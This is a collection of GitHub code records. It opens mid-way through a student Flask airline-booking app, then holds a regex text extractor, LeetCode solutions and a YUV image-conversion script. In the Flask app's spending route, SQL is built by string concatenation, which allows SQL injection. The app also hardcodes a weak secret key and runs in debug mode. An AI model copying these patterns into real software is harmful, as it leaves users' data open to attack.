airport;'''\r\n cursor.execute(query)\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('add_airport.html', message = message)\r\n@app.route('/addAirport', methods=['POST'])\r\ndef addAirport():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n name = request.form['name']\r\n city = request.form['city']\r\n cursor = conn.cursor();\r\n query = '''INSERT INTO `airport` (`name`, `city`)\r\n VALUES (%s, %s);'''\r\n try:\r\n cursor.execute(query, (name, city))\r\n conn.commit()\r\n except pymysql.IntegrityError:\r\n return render_template('add_airport.html', error = 'Airport already exists!')\r\n cursor.close()\r\n return redirect(url_for('add_airport'))\r\n\r\n@app.route('/view_rating')\r\ndef view_rating():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline 
== None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT flight.flight_no, flight.dep_datetime, AVG(rate) as rating\r\n FROM flight NATURAL JOIN take\r\n WHERE airline = %s\r\n GROUP BY flight.flight_no, flight.dep_datetime;'''\r\n cursor.execute(query, (airline))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n if message:\r\n return render_template('view_rating.html', data = message)\r\n else:\r\n return render_template('view_rating.html', error = 'flight does not exist or comment does not exist')\r\n@app.route('/viewFlightRating', methods=['POST'])\r\ndef viewFlightRating():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n flight_no = request.form['flight_no']\r\n dept_date = request.form['dept_date']\r\n cursor = conn.cursor();\r\n query = '''SELECT name, rate, comment\r\n FROM take NATURAL JOIN customer\r\n WHERE airline = %s AND (flight_no = %s) AND (DATE(dep_datetime) = %s);'''\r\n cursor.execute(query, (airline, flight_no, dept_date))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('view_rating.html', message = message)\r\n\r\n@app.route('/view_frequent_cust')\r\ndef view_frequent_cust():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT take.email AS email, name, COUNT(*) AS flight_count\r\n FROM take NATURAL JOIN customer\r\n WHERE airline = %s AND YEAR(dep_datetime) = YEAR(CURDATE())\r\n GROUP BY email\r\n ORDER BY COUNT(*) DESC\r\n LIMIT 1;'''\r\n cursor.execute(query, (airline))\r\n data = cursor.fetchone()\r\n cursor.close()\r\n print(data)\r\n if data:\r\n return render_template('view_frequent_cust.html', data = data)\r\n else:\r\n return render_template('view_frequent_cust.html', error = 'no flights were taken this year')\r\n\r\n@app.route('/view_cust_flights')\r\ndef view_cust_flights():\r\n return render_template('view_cust_flights.html')\r\n\r\n@app.route('/viewCustFlightsAction', methods=['POST'])\r\ndef viewCustFlightsAction():\r\n email = request.form['email']\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT dep_airport, arr_airport, flight.dep_datetime as dep_datetime, flight.flight_no as flight_no, ticket_id\r\n FROM take NATURAL JOIN customer NATURAL JOIN flight\r\n WHERE (airline = %s) AND (YEAR(dep_datetime) = 
YEAR(CURDATE()) - 1) AND (customer.email = %s);'''\r\n cursor.execute(query, (airline, email))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n print(data)\r\n if data:\r\n return render_template('view_cust_flights.html', data = data)\r\n else:\r\n return render_template('view_cust_flights.html', error = 'no flights were taken')\r\n\r\n@app.route('/view_sales')\r\ndef view_sales():\r\n return render_template('view_sales.html')\r\n\r\n@app.route('/viewSalesAction', methods=['POST'])\r\ndef viewSalesAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n start_date = request.form['start_date']\r\n end_date = request.form['end_date']\r\n cursor = conn.cursor();\r\n query = '''SELECT YEAR(sold_datetime) AS year, MONTH(sold_datetime) AS month, COUNT(*) as sales\r\n FROM ticket NATURAL JOIN take\r\n WHERE (sold_datetime BETWEEN %s AND %s) AND (airline = %s)\r\n GROUP BY YEAR(sold_datetime), MONTH(sold_datetime);'''\r\n cursor.execute(query, (start_date, end_date, airline))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n print(data)\r\n labels = []\r\n values = []\r\n for each in data:\r\n labels.append(str(each['year'])+'-'+str(each['month']))\r\n values.append(each['sales'])\r\n return render_template('bar_chart.html', title='Monthly Sales', max=10, labels=labels, values=values)\r\n# graphing courtesy of Ruan Bekker https://blog.ruanbekker.com/blog/2017/12/14/graphing-pretty-charts-with-python-flask-and-chartjs/\r\n\r\n@app.route('/view_quarter')\r\ndef view_quarter():\r\n return render_template('view_quarter.html')\r\n\r\n@app.route('/viewQuarterAction', methods=['POST'])\r\ndef viewQuarterAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n start_date = request.form['start_date']\r\n end_date = request.form['end_date']\r\n cursor = conn.cursor();\r\n # query = '''SELECT YEAR(sold_datetime) AS year, QUARTER(sold_datetime) AS quarter, SUM(price) as revenue\r\n # FROM ticket NATURAL JOIN take\r\n # WHERE (sold_datetime BETWEEN %s AND %s) AND (airline = %s)\r\n # GROUP BY YEAR(sold_datetime), QUARTER(sold_datetime);'''\r\n query = '''SELECT YEAR(sold_datetime) AS year, QUARTER(sold_datetime) AS quarter, SUM(price) as revenue\r\n FROM ticket\r\n WHERE (sold_datetime BETWEEN %s AND %s)\r\n GROUP BY YEAR(sold_datetime), QUARTER(sold_datetime);'''\r\n # cursor.execute(query, (start_date, end_date, airline))\r\n cursor.execute(query, (start_date, end_date))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n print(data)\r\n labels = []\r\n values = []\r\n colors = [\"#F7464A\", \"#46BFBD\", \"#FDB45C\", \"#FEDCBA\"]\r\n for each in data:\r\n labels.append(str(each['year'])+ ' Q' +str(each['quarter']))\r\n values.append(each['revenue'])\r\n return render_template('pie_chart.html', title='Quarterly Sales', max=100000, set=zip(values, 
labels, colors))\r\n# graphing courtesy of Ruan Bekker https://blog.ruanbekker.com/blog/2017/12/14/graphing-pretty-charts-with-python-flask-and-chartjs/\r\n\r\n@app.route('/customerHome',methods=['POST','GET'])\r\ndef customerHome():\r\n email = session['customer']['email']\r\n name = session['customer']['name']\r\n cursor = conn.cursor()\r\n view_by = \"dep_datetime\"\r\n qfuture = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport, status FROM take NATURAL JOIN flight WHERE email = %s AND dep_datetime > NOW() ORDER BY %s ASC'\r\n cursor.execute(qfuture, (email, view_by))\r\n future_flight = cursor.fetchall()\r\n qpast = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport,rate,comment FROM take NATURAL JOIN flight WHERE email = %s AND arr_datetime < NOW() ORDER BY %s DESC'\r\n cursor.execute(qpast,(email,view_by))\r\n past_flight = cursor.fetchall()\r\n cursor.execute('SELECT*FROM airport')\r\n city = cursor.fetchall()\r\n #add cities in flight informations\r\n for i in range(len(future_flight)):\r\n for n in city:\r\n if n['name']== future_flight[i]['dep_airport']:\r\n future_flight[i]['dep_city'] = n['city']\r\n if n['name']== future_flight[i]['arr_airport']:\r\n future_flight[i]['arr_city'] = n['city']\r\n for i in range(len(past_flight)):\r\n for n in city:\r\n if n['name']== past_flight[i]['dep_airport']:\r\n past_flight[i]['dep_city'] = n['city']\r\n if n['name']== past_flight[i]['arr_airport']:\r\n past_flight[i]['arr_city'] = n['city']\r\n return render_template('customer_home.html', name=name, email=email,future_flight=future_flight,past_flight=past_flight)\r\n@app.route('/viewMyFlight',methods=['GET','POST'])\r\ndef view_my_flight():\r\n email = session['customer']['email']\r\n name = session['customer']['name']\r\n cursor = conn.cursor()\r\n view_by = request.form['view_by']\r\n qfuture = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport, status FROM take NATURAL JOIN flight WHERE email = %s AND dep_datetime > NOW() ORDER BY %s ASC'\r\n cursor.execute(qfuture, (email, view_by))\r\n future_flight = cursor.fetchall()\r\n qpast = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport,rate,comment FROM take NATURAL JOIN flight WHERE email = %s AND arr_datetime < NOW() ORDER BY %s DESC'\r\n cursor.execute(qpast,(email,view_by))\r\n past_flight = cursor.fetchall()\r\n cursor.execute('SELECT*FROM airport')\r\n city = cursor.fetchall()\r\n #add cities in flight informations\r\n for i in range(len(future_flight)):\r\n for n in city:\r\n if n['name']== future_flight[i]['dep_airport']:\r\n future_flight[i]['dep_city'] = n['city']\r\n if n['name']== future_flight[i]['arr_airport']:\r\n future_flight[i]['arr_city'] = n['city']\r\n for i in range(len(past_flight)):\r\n for n in city:\r\n if n['name']== past_flight[i]['dep_airport']:\r\n past_flight[i]['dep_city'] = n['city']\r\n if n['name']== past_flight[i]['arr_airport']:\r\n past_flight[i]['arr_city'] = n['city']\r\n return render_template('customer_home.html', name=name, email=email,future_flight=future_flight,past_flight=past_flight)\r\n\r\n@app.route('/addComment',methods=['GET','POST'])\r\ndef add_comment():\r\n cursor = conn.cursor()\r\n email = session['customer']['email']\r\n rate, comment = request.form[\"rate\"], request.form[\"comment\"]\r\n flight_info = (email,request.form[\"cr_airline\"],request.form[\"cr_flight_no\"],request.form[\"cr_dep_datetime\"])\r\n cursor.execute(\"SELECT*FROM take WHERE email=%s AND airline=%s AND flight_no=%s AND 
dep_datetime=%s\",flight_info)\r\n if cursor.fetchall() is not None and rate in ('1','2','3','4','5'):\r\n #store query information from html form in this tuple\r\n cr_flight = (request.form[\"rate\"],request.form[\"comment\"],email,request.form[\"cr_airline\"],request.form[\"cr_flight_no\"],request.form[\"cr_dep_datetime\"])\r\n cursor.execute('UPDATE take SET rate=%s, comment=%s WHERE email=%s AND airline=%s AND flight_no=%s AND dep_datetime=%s',cr_flight)\r\n conn.commit()\r\n cursor.close()\r\n message = 'Comment Placed'\r\n else:\r\n message = 'Incorrect Format or Information'\r\n return render_template('customer_home.html', message=message)\r\n@app.route('/staff_home',methods=['GET','POST'])\r\ndef staff_home():\r\n cursor=conn.cursor()\r\n airline = session[\"staff\"][\"airline\"]\r\n qflight = 'SELECT * FROM flight WHERE airline=%s AND dep_datetime>NOW()'\r\n flight = cursor.execute(qflight,(airline))\r\n cursor.close()\r\n return render_template('staff_home.html')\r\n\r\n\r\n@app.route('/customerSearch',methods=['GET','POST'])\r\ndef customerSearch():\r\n return render_template('customer_search.html')\r\n\r\n@app.route('/customerSearchResult', methods=['GET', 'POST'])\r\ndef customerSearchResult():\r\n dept_city_airport = request.form['dept_city']\r\n dest_city_airport = request.form['dest_city']\r\n dept_date = request.form['dept_date']\r\n ret_date = request.form['ret_date']\r\n cursor = conn.cursor()\r\n if ret_date == '':\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city, base_price\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s;'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date))\r\n else:\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city, base_price\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s) OR ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s);'''\r\n cursor.execute(query, (\r\n dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date, dest_city_airport,\r\n dest_city_airport, dept_city_airport, dept_city_airport, ret_date))\r\n flight = cursor.fetchall()\r\n cursor.close()\r\n if data:\r\n return render_template('flight_search.html', flight=flight)\r\n else:\r\n error = 'no flight available, please search again'\r\n return render_template('flight_search.html', error=error)\r\n\r\n@app.route('/purchase', methods=['GET', 'POST'])\r\ndef purchase():\r\n return render_template('purchase.html')\r\n@app.route('/purchaseResult', methods=['GET', 'POST'])\r\ndef purchaseResult():\r\n cursor = conn.cursor()\r\n message = None\r\n while message==None:\r\n airline, flight_no, dep_datetime = request.form['airline'],request.form['flight_no'],request.form['dep_datetime']\r\n qflight = 'SELECT*FROM flight NATURAL JOIN airplane WHERE dep_datetime>NOW() AND airline= %s AND flight_no=%s AND dep_datetime=%s'\r\n cursor.execute(qflight, (airline, flight_no, 
dep_datetime))\r\n flight = cursor.fetchone()\r\n if flight is None:\r\n message = 'Flight Not Availible, Please Try Again'\r\n break\r\n base_price, seat_sold,capacity = int(flight['base_price']), int(flight['seat_sold']), int(flight['capacity'])\r\n if seat_sold >= capacity:\r\n message = 'Flight capacity is full'\r\n break\r\n elif seat_sold > 0.7*capacity:\r\n price = round(1.2*base_price,2)\r\n else:\r\n price = round(base_price,2)\r\n card_no, card_type, name, exp_date = request.form['card_no'], request.form['card_type'], request.form['name'], request.form['exp_date']\r\n sold_datetime = datetime.now()\r\n seat_sold += 1\r\n cursor.execute('SELECT ticket_id FROM ticket')\r\n new_ticket = str(random.randint(1000000000,9999999999))\r\n tickets = []\r\n for i in cursor.fetchall():\r\n tickets.append(i['ticket_id'])\r\n while new_ticket in tickets:\r\n new_ticket = str(random.randint(1000000000, 9999999999))\r\n add_ticket = 'INSERT INTO ticket values(%s,%s,%s,%s,%s,%s,%s)'\r\n cursor.execute(add_ticket,(new_ticket,price,sold_datetime,card_type,card_no,name,exp_date))\r\n add_take = 'INSERT INTO take values(%s,%s,%s,%s,%s,%s,%s)'\r\n cursor.execute(add_take,(session['customer']['email'],flight_no,airline,dep_datetime,0,'',new_ticket))\r\n add_passenger = 'UPDATE flight SET seat_sold=%s WHERE airline=%s AND flight_no=%s AND dep_datetime=%s'\r\n cursor.execute(add_passenger,(seat_sold,airline,flight_no,dep_datetime))\r\n conn.commit()\r\n cursor.close()\r\n message = 'Thank you, your total is:' + str(price)\r\n break\r\n #Create a new unique ticket id\r\n return render_template(\"purchase.html\",message=message)\r\n\r\n@app.route('/customerSpending',methods=['GET','POST'])\r\ndef customerSpendinng():\r\n cursor = conn.cursor()\r\n try:\r\n email = session['customer']['email']\r\n except:\r\n return render_template('index.html',message='please login to view your spending')\r\n query1 = \"SELECT DATE_FORMAT(sold_datetime, '%Y-%m') AS month , SUM(price) AS total FROM ticket NATURAL JOIN take WHERE email = '\"\r\n query2 = \"' GROUP BY month ORDER BY month DESC;\"\r\n query = query1 + str(email) + query2\r\n cursor.execute(query)\r\n spending = cursor.fetchall()\r\n return render_template('customer_spending.html',spending=spending)\r\n\r\n@app.route('/logoutStaff')\r\ndef logoutStaff():\r\n\tsession.pop('staff')\r\n\treturn render_template('/logout.html', logged_out = 'Logged Out!')\r\n@app.route('/logoutCustomer')\r\ndef logoutCustomer():\r\n\tsession.pop('customer')\r\n\treturn render_template('/logout.html', logged_out = 'Logged Out!')\r\n@app.route('/action_unauthorized')\r\ndef action_unauthorized():\r\n return render_template('action_unauthorized.html')\r\n\r\n\r\napp.secret_key = 'some key that you will never guess'\r\n#Run the app on localhost port 5000\r\n#debug = True -> you don't have to restart flask\r\n#for changes to go through, TURN OFF FOR PRODUCTION\r\nif __name__ == \"__main__\":\r\n\tapp.run('127.0.0.1', 5000, debug = True)\r\n","repo_name":"Ultrablocker/Databases_Project_Summer_2020","sub_path":"init1.py","file_name":"init1.py","file_ext":"py","file_size_in_byte":38356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42608611212","text":"import re # importing re module to deal with regular expressions\nimport sys # gives access to System-specific parameters and functions\n\n# defining command line input arguments to be entered by the user\n\nf = open(sys.argv[1], 'r') # opening the input file in read mode\n\n# 
defining list variables to store the results\ncurr_res = []\nmail_res = []\nphno_res = []\nukpostcode_res = []\nurl_res = []\nuszip_res = []\ndate_res = []\n\n# defining flag variables\n\nmail_flag = False\ncurr_flag = False\nphno_flag = False\nurl_flag = False\nukpostcode_flag = False\nuszip_flag = False\ndate_flag = False\n\n# email regular expresssion\nmail_regex = '[a-zA-Z0-9][a-zA-Z0-9!#$%&\\'*+/=.?^_`{|}~-]*@(?:[a-zA-Z](?:[a-zA-Z0-9-]*)?\\.)+[a-zA-Z0-9](?:[a-zA-Z0-9-]*[a-zA-Z])?'\n\n# currency regular expresssion\ncurr_regex = '(?:\\$|can\\$|C\\$|€|USD|CAD|EUR|ATS|BEF|DEM|EEK|ESP|FIM|FRF|GRD|IEP|ITL|LUF|NLG|PTE|can)[\\s\\S]?\\d{1,3}(?:,\\d{3})*(?:\\.\\d{1,3})?(?=\\s)'\n\n# UK Postal Code regular expresssion\nukpostcode_regex = '[A-Z]{1,2}[0-9R][0-9A-Z]? [0-9][ABD-HJLNP-UW-Z]{2}'\n\n# US phone number regular expresssion\nphno_regex = '[+]?[1\\s-]*[\\(-]?[0-9]{3}[-\\)]?[\\s-]?[0-9]{3}[\\s-]?[0-9]{4}(?=\\s)'\n\n# url regular expresssion\nurl_regex = 'http[s]?://(?:[a-zA-Z0-9$-_@.&+!*\\(\\),]|(?:%[0-9a-zA-Z]))+(?=\\s)'\n\n# US Zip code regular expression\nuszip_regex = '\\s?[0-9]{5}(?:-[0-9]{4})?$'\n\n# Date format: dd/mm/yyyy regular expression\ndate_regex1 = '\\s?(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:/)(?:0?[1-9]|1[0-2])(?:/)(?:\\d{4})'\n\n# Date format: mm/dd/yyyy regular expression\ndate_regex2 ='\\s?(?:0?[1-9]|1[0-2])(?:/)(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:/)(?:\\d{4})'\n\n# Date format: 1st, mon/month yyyy regular expression\ndate_regex3 = '\\s?(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:nd|rd|th|st)?(?:[\\s|,|]?\\s?)(?:[Jj]an(?:uary)?|[Ff]eb(?:ruary)?|[Mm]ar(?:ch)?|[Aa]pr(?:il)?|[Mm]ay|[Jj]une|[Jj]uly|[Aa]ug(?:ust)?|[Ss]ept(?:ember)?|[Oo]ct(?:ober)?|[Nn]ov(?:ember)?|[Dd]ec(?:ember)?)\\s\\d{4}'\n\n# Date format: mon/month, 1, yyyy regular expression\ndate_regex4 = '\\s?(?:[Jj]an(?:uary)?|[Ff]eb(?:ruary)?|[Mm]ar(?:ch)?|[Aa]pr(?:il)?|[Mm]ay|[Jj]une|[Jj]uly|[Aa]ug(?:ust)?|[Ss]ept(?:ember)?|[Oo]ct(?:ober)?|[Nn]ov(?:ember)?|[Dd]ec(?:ember)?)(?:[\\s|,]?\\s?)(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:[\\s|,]?\\s?)\\s\\d{4}'\n\n\nchoice = ['-e', '-u', '-p', '-c', '-k', '-z', '-d']\ncount = len(sys.argv)\n\nfor i in range(2, count):\n\n\tif (sys.argv[i]) not in choice:\n\t\tprint(\"\\nUsage: [optional arguments]\\n\\nFrist Argument\\t\", sys.argv[0], \"python script name with .py extension to be entered\\n\\nSecond Argument\", sys.argv[1], \"\\ttext input file with .txt extension to be entered as 2nd argument \\n\\n[optional arguments]\\n-e\\t--this option displays all the valid Email occurrences from the input file\\n-u\\t--this option displays all the valid Url occurrences from the input file\\n-c\\t--this option displays only EURO,Canada and US Currency format occurrences from the input file\\n-p\\t--this option displays only valid US Phone number occurrences from the input file\\n-k\\t--this option displays only valid UK Postal code occurrences from the input file\\n-z\\t--this option displays only valid US ZIP code occurrences from the input file\\n-d\\t--this option displays the following date format occurrences from the input file\\n\\t dd/mm/yyyy, mm/dd/yyyy, 1st mon/month yyyy, mon/month, 1, yyyy\")\n\t\tsys.exit()\n\n\telif sys.argv[i] == '-e':\n\t\tmail_flag = True\n\n\telif sys.argv[i] == '-c':\n\t\tcurr_flag = True\n\n\telif sys.argv[i] == '-u':\n\t\turl_flag = True\n\n\telif sys.argv[i] == '-p':\n\t\tphno_flag = True\n\n\telif sys.argv[i] == '-k':\n\t\tukpostcode_flag = True\n\n\telif sys.argv[i] == '-z':\n\t\tuszip_flag = True\n\n\telif sys.argv[i] == '-d':\n\t\tdate_flag = True\n\nfor line in 
f.readlines():\n\tif curr_flag is True:\n\t\tcurr = re.findall(curr_regex, line)\n\t\tif len(curr) > 0:\n\t\t\tcurr_res.extend(curr)\n\n\tif mail_flag is True:\n\t\tmail = re.findall(mail_regex, line)\n\t\tif len(mail) > 0:\n\t\t\tmail_res.extend(mail)\n\n\tif phno_flag is True:\n\t\tph = re.findall(phno_regex, line)\n\t\tif len(ph) > 0:\n\t\t\tphno_res.extend(ph)\n\n\tif ukpostcode_flag is True:\n\t\tukpostcode = re.findall(ukpostcode_regex, line)\n\t\tif len(ukpostcode) > 0:\n\t\t\tukpostcode_res.extend(ukpostcode)\n\n\tif url_flag is True:\n\t\turl = re.findall(url_regex, line)\n\t\tif len(url) > 0:\n\t\t\turl_res.extend(url)\n\n\tif uszip_flag is True:\n\t\tuszip = re.findall(uszip_regex, line)\n\t\tif len(uszip) > 0:\n\t\t\tuszip_res.extend(uszip)\n\n\tif date_flag is True:\n\t\tdate1 = re.findall(date_regex1, line)\n\t\tdate2 = re.findall(date_regex2, line)\n\t\tdate3 = re.findall(date_regex3, line)\n\t\tdate4 = re.findall(date_regex4, line)\n\t\tif len(date1) > 0:\n\t\t\tdate_res.extend(date1)\n\t\tif len(date2) > 0:\n\t\t\tdate_res.extend(date2)\n\t\tif len(date3) > 0:\n\t\t\tdate_res.extend(date3)\n\t\tif len(date4) > 0:\n\t\t\tdate_res.extend(date4)\n\n# printing the results\nfor i in range(2, count):\n\n\tif '-e' in sys.argv[i]:\n\t\tprint(\"\\nValid Email occurrences in the input file are:\\n\", mail_res)\n\n\tif '-c' in sys.argv[i]:\n\t\tprint(\"\\nRecognized currency (USD/CAD/EURO) occurrences in the input file are:\\n\", curr_res)\n\n\tif '-p' in sys.argv[i]:\n\t\tprint(\"\\nValid US Phone number occurrences in the input file are:\\n\", phno_res)\n\n\tif '-u' in sys.argv[i]:\n\t\tprint(\"\\nValid URL occurrences in the input file are:\\n\", url_res)\n\n\tif '-k' in sys.argv[i]:\n\t\tprint(\"\\nValid UK Postal code occurrences in the input file are:\\n\", ukpostcode_res)\n\n\tif '-z' in sys.argv[i]:\n\t\tprint(\"\\n Valid US ZIP code occurrences in the input file are:\\n\", uszip_res)\n\n\tif '-d' in sys.argv[i]:\n\t\tprint(\"\\n Recognized date formats (dd/mm/yyyy, mm/dd/yyyy, 1st,mon/month yyyy, mon/month 1, yyyy) in the input file are:\\n\", date_res)\n\n\n","repo_name":"ibm-ecm/content-analyzer-regex","sub_path":"python/Regex.py","file_name":"Regex.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"37062024827","text":"class Solution:\n def removeDuplicates(self, s: str, k: int) -> str:\n size = len(s)\n if k>size or not k: return s\n stack=[]\n for c in s:\n if stack and stack[-1][0]==c:\n stack[-1][1]+=1\n if stack[-1][1]==k:stack.pop()\n continue\n stack.append([c,1])\n res=''\n for value, count in stack:\n res+=value*count\n return res","repo_name":"simon7426/Competitive-Programming-AC-Submissions","sub_path":"Leetcode/python3/1209.remove-all-adjacent-duplicates-in-string-ii.medium.py","file_name":"1209.remove-all-adjacent-duplicates-in-string-ii.medium.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"32987282766","text":"\nimport cv2\nimport numpy as np\n# import Image\nscreenLevels = 255.0\ndef yuv_import(filename,dims,numfrm,startfrm):\n fp=open(filename,'rb')\n blk_size = int(np.prod(dims) *3/2)\n #fp.seek(blk_size*startfrm,0)\n Y=[]\n U=[]\n V=[]\n print(dims[0])\n print(dims[1])\n d00=dims[0]//2\n d01=dims[1]//2\n print(d00)\n print(d01)\n Yt=np.zeros((dims[0],dims[1]),np.uint8,'C')\n Ut=np.zeros((d00,d01),np.uint8,'C')\n 
Vt=np.zeros((d00,d01),np.uint8,'C')\n # yuv=zeros((dims[0]*3//2,dims[1]))\n for i in range(numfrm):\n for m in range(dims[0]):\n for n in range(dims[1]):\n #print m,n\n num=fp.read(1)\n Yt[m,n]=ord(num)\n for m in range(d00):\n for n in range(d01):\n Ut[m,n]=ord(fp.read(1))\n for m in range(d00):\n for n in range(d01):\n Vt[m,n]=ord(fp.read(1))\n Y=Y+[Yt]\n U=U+[Ut]\n V=V+[Vt]\n fp.close()\n return (Y,U,V)\nif __name__ == '__main__':\n width=480\n height=272\n data=yuv_import('E:\\\\project\\\\2020_Project\\\\partiledetect\\\\YUV\\\\cuc_view_480x272.yuv',(height,width),1,0)\n rgb=np.zeros((height,width,3))\n YY=data[0][0]\n cv2.imshow(\"show\",YY)\n\n b=np.fromfile('E:\\\\project\\\\2020_Project\\\\partiledetect\\\\YUV\\\\cuc_view_480x272.yuv',np.uint8,height*width*3//2)\n c=b.reshape((height*3//2,width))\n rgb=cv2.cvtColor(c,cv2.COLOR_YUV2BGR_I420,rgb)\n cv2.imshow(\"rgb\",rgb)\n cv2.imwrite(\"rgb.jpg\",rgb)\n cv2.waitKey(0)","repo_name":"x1ng-z/partiledetect","sub_path":"YUV/yuvprocess.py","file_name":"yuvprocess.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32253706315","text":"import sys\nsys.stdin=open('ladder.txt')\n\ndy=[0,0,1] #좌 우 하\ndx=[-1,1,0]\n\ndef dfs(y,x):\n global step\n global flag\n if flag==1:\n return\n visited[y][x]=1\n for z in range(3):\n testy=y+dy[z]\n testx=x+dx[z]\n if -1 None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n O(m+n) space and O(mn) time\n \"\"\"\n row = set()\n column = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n row.add(i)\n column.add(j)\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if i in row or j in column:\n matrix[i][j] = 0\n\n def setZeroes(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n O(1) space O(mn) time, is_col is for matrix[0][0] to see whether it is both column and row or just row\n \"\"\"\n is_col = False\n R = len(matrix)\n C = len(matrix[0])\n for i in range(R):\n if matrix[i][0] == 0:\n is_col = True\n for j in range(1, C):\n if matrix[i][j] == 0:\n matrix[0][j] = 0\n matrix[i][0] = 0\n for i in range(1,R):\n for j in range(1,C):\n if matrix[0][j] == 0 or matrix[i][0] == 0:\n matrix[i][j] = 0\n if matrix[0][0] == 0:\n for j in range(C):\n matrix[0][j] = 0 \n if is_col:\n for i in range(R):\n matrix[i][0] = 0","repo_name":"Eustaceyi/Leetcode","sub_path":"73. Set Matrix Zeroes.py","file_name":"73. 
